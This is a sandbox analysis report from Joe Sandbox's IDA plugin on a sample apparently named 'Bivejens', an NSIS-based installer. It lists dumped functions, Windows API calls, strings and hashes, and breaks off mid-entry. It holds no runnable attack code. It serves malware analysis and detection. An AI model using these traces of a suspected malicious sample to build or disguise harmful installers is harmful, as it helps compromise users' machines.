Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3195845224
Opcode ID: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
Opcode Fuzzy Hash: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C80
GetDlgItem.USER32(?,00000408), ref: 00404C8B
GlobalAlloc.KERNEL32(?,?), ref: 00404CD5
LoadBitmapW.USER32(?), ref: 00404CE8
SetWindowLongW.USER32(?,?,00405260), ref: 00404D01
ImageList_Create.COMCTL32(?,?,?,?,00000000), ref: 00404D15
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
SendMessageW.USER32(?,00001109,?), ref: 00404D3D
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404D5B
DeleteObject.GDI32(00000000), ref: 00404D5E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
SendMessageW.USER32(?,0000110A,?,00000000), ref: 00404E56
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
GetWindowLongW.USER32(?,?), ref: 00404E99
SetWindowLongW.USER32(?,?,00000000), ref: 00404EA7
ShowWindow.USER32(?,?), ref: 00404EB8
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
SendMessageW.USER32(?,00000420,00000000,?), ref: 00405053
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
ImageList_Destroy.COMCTL32(?), ref: 00405088
GlobalFree.KERNEL32(?), ref: 00405098
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
InvalidateRect.USER32(?,00000000,?), ref: 004051E9
ShowWindow.USER32(?,00000000), ref: 00405237
GetDlgItem.USER32(?,000003FE), ref: 00405242
ShowWindow.USER32(00000000), ref: 00405249

Strings

M, xrefs: 00404E12
N, xrefs: 00404EF3
, xrefs: 00405221

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
Opcode Fuzzy Hash: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,774D3420,004059B6,?,00437800,774D3420), ref: 004065D2
FindClose.KERNEL32(00000000), ref: 004065DE

Strings

8gB, xrefs: 004065C8

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB
API String ID: 2295610775-1733800166
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

Function 21090040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5q, xrefs: 2109015B

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID: .5q
API String ID: 0-3553790735
Opcode ID: c1141957a28550ad808cbea2636a86dc38ae66d5b9d546d54102f93cbc917364
Instruction ID: 52e56a5d52bf00677c896f58bcab23b338a7263a65bb37394853a3fb4fd342bd
Opcode Fuzzy Hash: c1141957a28550ad808cbea2636a86dc38ae66d5b9d546d54102f93cbc917364
Instruction Fuzzy Hash: 3C52AC74E01228CFDB64DF65C890B9DBBB2BF89300F1081EAD849AB255DB359E85CF50

Function 21987998 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52add1b3d2126d80e0b27137f20a7967d7091c35f4385a4c93f5cd00cf415b9
Instruction ID: d80bc1e9b79fe0cd20c0dfab6bc8d8440ada205d5b77a63e99e6848fd054f107
Opcode Fuzzy Hash: e52add1b3d2126d80e0b27137f20a7967d7091c35f4385a4c93f5cd00cf415b9
Instruction Fuzzy Hash: 77D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198E790 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa13c06bca4c6a19a6ad1b301bbf20facb0463959646a85b619867a8695a4f0
Instruction ID: 615347e1f6f4ac7aad745173e19201bb928f236192bc791e2f6b99106a1d35b4
Opcode Fuzzy Hash: 9fa13c06bca4c6a19a6ad1b301bbf20facb0463959646a85b619867a8695a4f0
Instruction Fuzzy Hash: 7DD19374E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198BC88 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625648bfbd0a974075c1bee72651614818777e40b0cbe8c856ff9a24abcbb46c
Instruction ID: 61d110e47840de252b758f3d36f5f4f3b8b980f878b9bf5b3ea1588f1622acd7
Opcode Fuzzy Hash: 625648bfbd0a974075c1bee72651614818777e40b0cbe8c856ff9a24abcbb46c
Instruction Fuzzy Hash: 08D19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21988CB8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebbdb9726ee62080c80f66372767e080b7415f97f1fd991bc8cfc9c53da6707b
Instruction ID: 46ced174ea7ab5c9e2d283095f1a7737ee91d43e47c49fe9939677b654ade337
Opcode Fuzzy Hash: ebbdb9726ee62080c80f66372767e080b7415f97f1fd991bc8cfc9c53da6707b
Instruction Fuzzy Hash: A8D19274E01228CFEB54DFA5C994B9DBBB2BF89300F5081A9D409AB355DB359E81CF50

Function 2198FAB0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8010210b5b847a5b6dcdfdd891c94e6997431e3f67698c70b2f900a7e66baac
Instruction ID: 357691c5788c4186cb07e56518c61d6941c204c2b6ec76bf3dcfbc3d5e7af18a
Opcode Fuzzy Hash: d8010210b5b847a5b6dcdfdd891c94e6997431e3f67698c70b2f900a7e66baac
Instruction Fuzzy Hash: BFD19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198CFA8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edde2e20ac3a89ccd84767dbc745b110544ff079d168f493db0dd5b432218c8
Instruction ID: adb61decddd433f8b708272f9b6253f22dafd39bafe2ce7b2dddfbdce601a07c
Opcode Fuzzy Hash: 5edde2e20ac3a89ccd84767dbc745b110544ff079d168f493db0dd5b432218c8
Instruction Fuzzy Hash: 7DD18274E01228CFEB54DFA5C994B9DBBB2BF89300F5081A9D409AB355DB359E81CF50

Function 2198A4A0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05981067ab57ca585c58a76ba6416d549515dabe1933151cdf99f9831c8bab89
Instruction ID: 0b2e6660079fbe6fc8add761098faf523f57f9136c10c4abd8c705b61ae3410f
Opcode Fuzzy Hash: 05981067ab57ca585c58a76ba6416d549515dabe1933151cdf99f9831c8bab89
Instruction Fuzzy Hash: 1CD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21989FD8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b7292fb4178078b28980311af310321a9c3398cef60b209162ab5904a0a031
Instruction ID: 3d4c7e00d7cfa24d5fa6e8f92521e8bbbe3547f2e71209251cf4531f912f38c1
Opcode Fuzzy Hash: 04b7292fb4178078b28980311af310321a9c3398cef60b209162ab5904a0a031
Instruction Fuzzy Hash: 0ED19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 219874D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638611f5296009276603ad9f1bc120ff5698b7c1b6fb33ba8dd0627c4bfedfbb
Instruction ID: 8005a92c938e99bb7ebf06d3c938273555b97e2fbaf5ea85aa98f9b7d3ef5744
Opcode Fuzzy Hash: 638611f5296009276603ad9f1bc120ff5698b7c1b6fb33ba8dd0627c4bfedfbb
Instruction Fuzzy Hash: E6D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198E2C8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a05f5b24c9b0de6195f7f27b6e59646cc63021fa2e1b2621e86d53f9458bbb
Instruction ID: bc6e2053e98a0e5cb2372f613b8083c18a78843f20cdefde8fede61762454d2d
Opcode Fuzzy Hash: b2a05f5b24c9b0de6195f7f27b6e59646cc63021fa2e1b2621e86d53f9458bbb
Instruction Fuzzy Hash: 63D1A174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198B7C0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87d4bef7d759cdb7b9ae6ac88143b0eab31b2a8c74e36849e0d98b891bb9dc1
Instruction ID: d7780c721cbbf7c43521cf28d40f182cd82b5457b362fa167e50e902e09b56d0
Opcode Fuzzy Hash: f87d4bef7d759cdb7b9ae6ac88143b0eab31b2a8c74e36849e0d98b891bb9dc1
Instruction Fuzzy Hash: C0D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198B2F8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611102e16db262b0c7e78209cea9f1524056af67a9b80154d1fd8b0ffb6c708d
Instruction ID: 8fa93838724baa1cde42f723197f52a51fc0c82c197f89c0981afbc045ce27de
Opcode Fuzzy Hash: 611102e16db262b0c7e78209cea9f1524056af67a9b80154d1fd8b0ffb6c708d
Instruction Fuzzy Hash: F7D19074E01228CFEB54DFA5C994B9DBBB2BF89300F2481A9D409AB355DB359E81CF50

Function 219887F0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22106e4bcb87e2985af4d51b71157870231e2d113de1b4247c88e073d613d77a
Instruction ID: abd19dcbbbc77b0a3700e133eda6b92bd2eec81ddb1b3b2b21b79249e95c0076
Opcode Fuzzy Hash: 22106e4bcb87e2985af4d51b71157870231e2d113de1b4247c88e073d613d77a
Instruction Fuzzy Hash: BAD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198F5E8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1b9453d731e0940372da89900874843aa38ee1af17dbaa2932639a16c7be0b8
Instruction ID: e9ae9308f4ef9f750aadc463b01f6fd0400ac24ffe95c86ba16f83f62327854a
Opcode Fuzzy Hash: b1b9453d731e0940372da89900874843aa38ee1af17dbaa2932639a16c7be0b8
Instruction Fuzzy Hash: 6ED19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198CAE0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0f31d7dbef46b2ebd79e6605887ce2f516ec45b99f4bcc43c33e7dabfb2484
Instruction ID: c0873fffc1e36e4721967299d6c0d533464dfdb8028f0e1daa0fdc9bd36f272a
Opcode Fuzzy Hash: 5c0f31d7dbef46b2ebd79e6605887ce2f516ec45b99f4bcc43c33e7dabfb2484
Instruction Fuzzy Hash: EED19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198C618 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66a772e412cf9b33e9eb1cd1bbf0601f755ee31ad33a9c93ee02e5a9294ceb8
Instruction ID: b5e0cea50dbd59995e445bb0cf9d328d82609a97e1e5ed843bcd7a00a1756d1f
Opcode Fuzzy Hash: f66a772e412cf9b33e9eb1cd1bbf0601f755ee31ad33a9c93ee02e5a9294ceb8
Instruction Fuzzy Hash: 7ED19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21989B10 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05eae4aa1d5e431b8109e6a77bbae1b768e38e9691ff327fe67ce48642ff534f
Instruction ID: 117d39b5658bb01e973d4f6dafa074880b194aa49e8b145bb879305de2f0dc6a
Opcode Fuzzy Hash: 05eae4aa1d5e431b8109e6a77bbae1b768e38e9691ff327fe67ce48642ff534f
Instruction Fuzzy Hash: E3D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21987008 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b4d5910dc9d9b9cb3215aa05a9c4ccb782903b2b6eb584c371a4ca3fdc4c8b
Instruction ID: 586eb6e016e008deb6bb868f7a8b6a6466f2d727faba771119a4f74c8060afa6
Opcode Fuzzy Hash: a7b4d5910dc9d9b9cb3215aa05a9c4ccb782903b2b6eb584c371a4ca3fdc4c8b
Instruction Fuzzy Hash: 1FD19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198DE00 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ba3a9515797a5df6a9988b57c11b9606f38ae3a782ac532ebcaaec5e427fb7
Instruction ID: 8abdfd3e59ca1e1602a627981bfcf13a395d60fcb6590b458f9fb3ad3a900b9b
Opcode Fuzzy Hash: 59ba3a9515797a5df6a9988b57c11b9606f38ae3a782ac532ebcaaec5e427fb7
Instruction Fuzzy Hash: 5FD1A274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198D938 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 618d0e7179a7ba1181768c02908aeb54f14944d2a1236d15967d463765559240
Instruction ID: 8a6d7c64bb56f5422aaca7aaa9d4c9b2a7b5fd85254d882839145954012e5a1b
Opcode Fuzzy Hash: 618d0e7179a7ba1181768c02908aeb54f14944d2a1236d15967d463765559240
Instruction Fuzzy Hash: 0FD18074E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198AE30 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0121a6947e043bef06af98812e1df5f09d08b74b6d7aac3e2cae983ce153720e
Instruction ID: bd6df959bab715086c2f51f045422e82d61317ad9aa087a2bdf19bf16ecdcb4f
Opcode Fuzzy Hash: 0121a6947e043bef06af98812e1df5f09d08b74b6d7aac3e2cae983ce153720e
Instruction Fuzzy Hash: 71D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21988328 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9676f7dcbaf2a884f74c8186e8fa18173ce4beb2ef22dcaf1730cd056285a31d
Instruction ID: 7a053dbc2f9d7dfdf5b222024c63544225a4f2e80a22e31096f309a5d3a9887f
Opcode Fuzzy Hash: 9676f7dcbaf2a884f74c8186e8fa18173ce4beb2ef22dcaf1730cd056285a31d
Instruction Fuzzy Hash: 2ED19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198F120 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32804c8caf2cd160fddf1711e328f59d72ddc470a21a27c61601970f32f103f
Instruction ID: 2e593bb33c4347a633ae653873a8234172a84509682fe96596c1359391c3705a
Opcode Fuzzy Hash: a32804c8caf2cd160fddf1711e328f59d72ddc470a21a27c61601970f32f103f
Instruction Fuzzy Hash: CFD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198EC58 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400c912fa66d6c77f3c760e8e385119dc1243815937215b3c8005f989889ee71
Instruction ID: 8a1b78c8f1110d39573fbf9610850c842734810409634fc84d552e3a45e0d15e
Opcode Fuzzy Hash: 400c912fa66d6c77f3c760e8e385119dc1243815937215b3c8005f989889ee71
Instruction Fuzzy Hash: 82D1A274E01228CFEB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E81CF50

Function 2198C150 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4497c2176ead3c2c3842b7964d3f32377eeac1e5f6796948391f58199870a157
Instruction ID: d27f2c494f9f121129297cf55d7b47822974e1d24fca45c5f9b920a07f135a97
Opcode Fuzzy Hash: 4497c2176ead3c2c3842b7964d3f32377eeac1e5f6796948391f58199870a157
Instruction Fuzzy Hash: C2D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21989648 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0fc977d13db857c935f1d0e232402ac46f5971050203e373639a263fb784836
Instruction ID: e63d3a36e0292e483283c991c5202d39f45d8c8677da45ec223f4899db139e40
Opcode Fuzzy Hash: f0fc977d13db857c935f1d0e232402ac46f5971050203e373639a263fb784836
Instruction Fuzzy Hash: 63D19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21986B40 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75a36c2679cd896ab3777879f57a727dba122fd56c61641734272c617d59df9
Instruction ID: feffd629270cc6d6a8b3fb4be2b960d000ca7f76f79c74421fec431ea34ecec3
Opcode Fuzzy Hash: e75a36c2679cd896ab3777879f57a727dba122fd56c61641734272c617d59df9
Instruction Fuzzy Hash: 30D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198D470 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c086634b6860fbba7462545ab50674b63a0db383b7dd0366f8f54af4c96b1ae
Instruction ID: 6070b2b8ebd37e9ece1e8515ca0760a44e6fb56c5f940f8ede4fc366c30cbd70
Opcode Fuzzy Hash: 7c086634b6860fbba7462545ab50674b63a0db383b7dd0366f8f54af4c96b1ae
Instruction Fuzzy Hash: B0D19074E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 2198A968 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

